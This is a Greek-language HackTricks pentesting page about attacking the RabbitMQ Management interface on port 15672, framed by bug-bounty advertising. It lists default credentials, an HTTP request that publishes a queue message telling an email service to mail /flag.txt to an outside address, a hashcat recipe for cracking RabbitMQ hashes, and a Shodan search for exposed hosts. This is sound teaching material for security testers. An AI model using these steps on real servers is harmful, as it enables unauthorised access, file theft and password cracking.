hacktricks/network-services-pentesting/15672-pentesting-rabbitmq-management.md

6.9 KiB
Raw Blame History

15672 - Ελεγχος Εισβολής στη Διαχείριση του RabbitMQ

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρός Συνεργάτης της Ομάδας HackTricks στο AWS)!

Άλλοι τρόποι υποστήριξης των HackTricks:

Συμβουλή για bug bounty: Εγγραφείτε στο Intigriti, μια πρεμιέρα πλατφόρμα bug bounty δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος στο https://go.intigriti.com/hacktricks σήμερα, και αρχίστε να κερδίζετε αμοιβές έως και $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Βασικές Πληροφορίες

Μπορείτε να μάθετε περισσότερα για το RabbitMQ στο 5671,5672 - Ελεγχος Εισβολής στο AMQP.
Σε αυτή τη θύρα μπορείτε να βρείτε τον διακεκριμένο διακομιστή RabbitMQ Management εάν το πρόσθετο διαχείρισης είναι ενεργοποιημένο.
Η κύρια σελίδα θα πρέπει να μοιάζει με αυτήν:

Απαρίθμηση

Οι προεπιλεγμένες διαπιστευτήρια είναι "guest":"guest". Αν δεν λειτουργούν, μπορείτε να δοκιμάσετε να εκτελέσετε βίαιη εισβολή στην είσοδο.

Για να ξεκινήσετε χειροκίνητα αυτή την ενότητα πρέπει να εκτελέσετε:

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

Αφού έχετε ελέγξει σωστά τα διαπιστευτήριά σας, θα δείτε τη διαχειριστική κονσόλα:

Επίσης, αν έχετε έγκυρα διαπιστευτήρια, μπορεί να σας ενδιαφέρει η πληροφορία του http://localhost:15672/api/connections

Σημειώστε επίσης ότι είναι δυνατόν να δημοσιεύσετε δεδομένα μέσα σε μια ουρά χρησιμοποιώντας το API αυτής της υπηρεσίας με ένα αίτημα όπως:

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

Αποκωδικοποίηση Hash

echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist

Shodan

  • port:15672 http

Συμβουλή για ανταμοιβή ευρημάτων προβλημάτων: Εγγραφείτε στο Intigriti, μια πρεμιέρα πλατφόρμα ανταμοιβής ευρημάτων προβλημάτων δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος στο https://go.intigriti.com/hacktricks σήμερα, και αρχίστε να κερδίζετε ανταμοιβές μέχρι $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks: